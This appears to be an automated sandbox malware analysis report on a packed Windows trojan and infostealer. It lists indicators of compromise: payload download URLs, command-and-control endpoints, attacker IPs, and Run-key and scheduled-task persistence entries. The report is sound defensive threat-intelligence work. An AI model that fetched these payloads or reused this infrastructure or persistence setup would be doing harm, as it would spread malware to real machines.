                                steamcommunity.com
                                23.197.127.21
                                truetrue
                                tventyvf20pt.top
                                5.53.124.195
                                truetrue
                                cowod.hopto.org
                                45.132.206.251
                                truetrue
                                ipinfo.io
                                34.117.59.81
                                truefalse
                                iplogger.org
                                172.67.74.161
                                truefalse
                                nerv.com.pe
                                162.241.61.218
                                truefalse
                                nwgrus.ru
                                62.150.232.50
                                truetrue
                                api64.ipify.org
                                173.231.16.77
                                truefalse
                                bbuseruploads.s3.amazonaws.com
                                unknown
                                unknowntrue
                                NameMaliciousAntivirus DetectionReputation
                                opponnentduei.shoptrue
                                  http://176.113.115.33/thebig/noode.exefalse
                                    193.233.255.84:4284true
                                      quotamkdsdqo.shoptrue
                                        +tventyvf20pt.toptrue
                                          http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinfalse
                                            chickerkuso.shoptrue
                                              https://116.203.165.127/softokn3.dlltrue
                                                analforeverlovyu.toptrue
                                                  https://api64.ipify.org/?format=jsonfalse
                                                    f20pt.toptrue
                                                      http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1false
                                                        http://nwgrus.ru/tmp/index.phptrue
                                                          http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300false
                                                            https://steamcommunity.com/profiles/76561199780418869true
                                                              http://103.130.147.211/Files/1.exetrue
                                                                http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exefalse
                                                                  http://tech-servers.in.net/tmp/index.phptrue
                                                                    achievenmtynwjq.shoptrue
                                                                      http://unicea.ws/tmp/index.phptrue
                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                        https://duckduckgo.com/chrome_newtabv7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://gcc.gnu.org/bugs/):v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            https://nerv.com.pe:80/sdhsfd.exe~atRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://176.113.115.33/thebig/noode.exeC:RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://duckduckgo.com/ac/?q=v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  http://tventyvf20pt.top/v1/upload.php)=v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001301000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814299974.0000000001304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://nerv.com.pe/sdhsfd.exezRegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      http://tventyvf20pt.top/dv7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814480702.0000000001318000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        http://176.111.174.109/kurwaC:RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://api64.ipify.org/;RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://nerv.com.pe:80/sdhsfd.exeiRegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              https://aka.ms/msal-client-appsZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                https://aka.ms/msal-net-enable-keychain-accessZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                  http://cowod.hopto.org_DEBUG.zip/cLeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    http://schemas.xmlsoap.org/soap/httpZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                      http://103.130.147.211/Files/1.exeC:RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://sso2urn:ietf:wg:oauth:2.0:oobZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                          https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinxetRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://aka.ms/msal-net-upZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                http://schemas.xmlsoap.org/wsdl/soap12/shttp://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702ihtZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                  http://tventyvf20pt.top/v1/upload.phpv7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://nerv.com.pe:80/5.44.104/prog/66e705d09b33c_jack.exeRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://nerv.com.pe/vsfdhgg15.exe3tRegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://nerv.com.pe:80/vfsdgdf.exe6fRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          http://www.innosetup.com/kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            https://api.ip.sb/ipRK8ajtyf9pvKlaXEo3EjTbnu.exe, 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              http://147.45.44.104/prog/66e705d09b33c_jack.exeCRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinekvOccCLzMNloI4W4GuGOaRuh.exe, kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://www.ecosia.org/newtab/v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinC:RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Issueshttp://schemas.xmlsoap.org/ws/2005/05/identity/NoPZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                          http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300xeRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://www.winimage.com/zLibDllm_objectZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://ipinfo.io/RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://schemas.xmlsoap.org/wsdl/j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                  http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1)RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://147.45.44.104/yuop/66ed9885d9aee_Day2.exeC:RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://nerv.com.pe/vsfdhgg15.exeC:RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://ipinfo.io/https://ipgeolocation.io/::SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.000000000420F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.00000000041A4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                          https://ipinfo.io:443/widget/demo/8.46.123.33RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://bitbucket.org:80/kcatelin/jameson/downloads/easyfirewall.exekRegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://nerv.com.pe:80/RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                http://41.216.188.190:80/api/wp-ping.phpRegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://nerv.com.pe:80/vsfdhgg15.exeRegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUkvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                                      https://aka.ms/adal_token_cache_serializationZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                        https://nerv.com.pe/vsfdhgg15.exe705d09RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://iplogger.org/RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://176.111.174.109/kurwaS27RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://aka.ms/msal-net-iwaZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                https://aka.ms/msal-net-up)Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                  https://ipgeolocation.io/RegAsm.exefalse
                                                                                                                                                                                    http://41.216.188.190/api/wp-ping.phpRegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://nerv.com.pe:80/vfsdgdf.exeRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icov7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://aka.ms/msal-net-enable-keychain-groupsZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                              https://aka.ms/msal-net-system-browsersZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                https://api64.ipify.org/?format=jsonORegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exeinRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://www.remobjects.com/psUkvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://login.microsoftonline.com/common/Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                        https://aka.ms/msal-interactive-androidZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                          https://aka.ms/msal-brokers.Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                            https://aka.ms/msal-net-2-released)Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                              https://login.microsoftonline.com/commonZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                                http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300ARegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1RaRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://41.216.188.190/jRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://41.216.188.190/api/wp-admin.php9RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://aka.ms/net-cache-persistence-errors.Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                                          http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1C:RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://aka.ms/msal-net-iwaZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                                              http://aka.ms/valid-authoritiesZt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                                                http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us3001RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://nerv.com.pe:80/sdhsfd.exelfbRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://41.216.188.190/gRegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://api64.ipify.org:443/?format=jsonRegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        162.241.61.218
                                                                                                                                                                                                                                        nerv.com.peUnited States
                                                                                                                                                                                                                                        46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                        176.113.115.33
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        49505SELECTELRUfalse
                                                                                                                                                                                                                                        116.203.165.127
                                                                                                                                                                                                                                        unknownGermany
                                                                                                                                                                                                                                        24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                        34.117.59.81
                                                                                                                                                                                                                                        ipinfo.ioUnited States
                                                                                                                                                                                                                                        139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                        45.202.35.101
                                                                                                                                                                                                                                        unknownSeychelles
                                                                                                                                                                                                                                        139086ONL-HKOCEANNETWORKLIMITEDHKtrue
                                                                                                                                                                                                                                        176.111.174.109
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        201305WILWAWPLfalse
                                                                                                                                                                                                                                        103.130.147.211
                                                                                                                                                                                                                                        unknownTurkey
                                                                                                                                                                                                                                        63859MYREPUBLIC-AS-IDPTEkaMasRepublikIDtrue
                                                                                                                                                                                                                                        147.45.44.104
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                        185.196.8.214
                                                                                                                                                                                                                                        ckmqpoy.netSwitzerland
                                                                                                                                                                                                                                        34888SIMPLECARRER2ITtrue
                                                                                                                                                                                                                                        45.132.206.251
                                                                                                                                                                                                                                        cowod.hopto.orgRussian Federation
                                                                                                                                                                                                                                        59731LIFELINK-ASRUtrue
                                                                                                                                                                                                                                        54.231.236.201
                                                                                                                                                                                                                                        s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                        172.67.74.161
                                                                                                                                                                                                                                        iplogger.orgUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        193.233.255.84
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                                                                                        41.216.188.190
                                                                                                                                                                                                                                        unknownSouth Africa
                                                                                                                                                                                                                                        40676AS40676USfalse
                                                                                                                                                                                                                                        185.166.143.48
                                                                                                                                                                                                                                        bitbucket.orgGermany
                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                        23.197.127.21
                                                                                                                                                                                                                                        steamcommunity.comUnited States
                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUtrue
                                                                                                                                                                                                                                        5.53.124.195
                                                                                                                                                                                                                                        tventyvf20pt.topRussian Federation
                                                                                                                                                                                                                                        49505SELECTELRUtrue
                                                                                                                                                                                                                                        173.231.16.77
                                                                                                                                                                                                                                        api64.ipify.orgUnited States
                                                                                                                                                                                                                                        18450WEBNXUSfalse
                                                                                                                                                                                                                                        92.119.114.169
                                                                                                                                                                                                                                        unknownUkraine
                                                                                                                                                                                                                                        204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLfalse
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1514956
                                                                                                                                                                                                                                        Start date and time:2024-09-21 14:47:09 +02:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 14m 43s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:48
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.mine.winEXE@93/120@15/20
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 91.7%
                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.140, 40.126.32.72, 40.126.32.74, 20.190.160.17, 20.190.160.14, 20.190.160.20, 40.126.32.134, 184.28.90.27, 13.89.179.12, 20.189.173.20
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, questionmwq.shop, pool.hashvault.pro, sentistivowmi.shop, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, chickerkuso.shop, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                                        • Execution Graph export aborted for target j6V5568MqaTghErAlfE30BBB.exe, PID 7888 because it is empty
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        08:47:59API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe modified
                                                                                                                                                                                                                                        08:48:26API Interceptor23x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                                                                        08:48:27API Interceptor1x Sleep call for process: j6V5568MqaTghErAlfE30BBB.exe modified
                                                                                                                                                                                                                                        08:48:29API Interceptor1x Sleep call for process: Zt2eeOHcoNwxYT3C9R8h67os.exe modified
                                                                                                                                                                                                                                        08:48:35API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                        08:48:35API Interceptor727x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                                        08:48:40API Interceptor3x Sleep call for process: v7u3knm8W6_1U6jDWPH31qsx.exe modified
                                                                                                                                                                                                                                        08:48:44API Interceptor1x Sleep call for process: u7IEXZpDnp1f9d_IZKWnjEtv.exe modified
                                                                                                                                                                                                                                        08:48:50API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                        08:49:14API Interceptor61x Sleep call for process: videocompressor32.exe modified
                                                                                                                                                                                                                                        08:49:37API Interceptor1x Sleep call for process: jewkkwnf.exe modified
                                                                                                                                                                                                                                        13:48:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6 C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
                                                                                                                                                                                                                                        13:48:45Task SchedulerRun new task: jewkkwnf HR path: C:\ProgramData\jewkkwnf\jewkkwnf.exe
                                                                                                                                                                                                                                        13:48:52Task SchedulerRun new task: jewkkwnf LG path: C:\ProgramData\jewkkwnf\jewkkwnf.exe
                                                                                                                                                                                                                                        13:48:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6 C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
                                                                                                                                                                                                                                        13:49:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
                                                                                                                                                                                                                                        13:49:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dell C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe
                                                                                                                                                                                                                                        13:49:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dell C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe
                                                                                                                                                                                                                                        13:50:14Task SchedulerRun new task: Firefox Default Browser Agent 91F02B820833AE9E path: C:\Users\user\AppData\Roaming\ahcsduh
                                                                                                                                                                                                                                        13:50:37Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
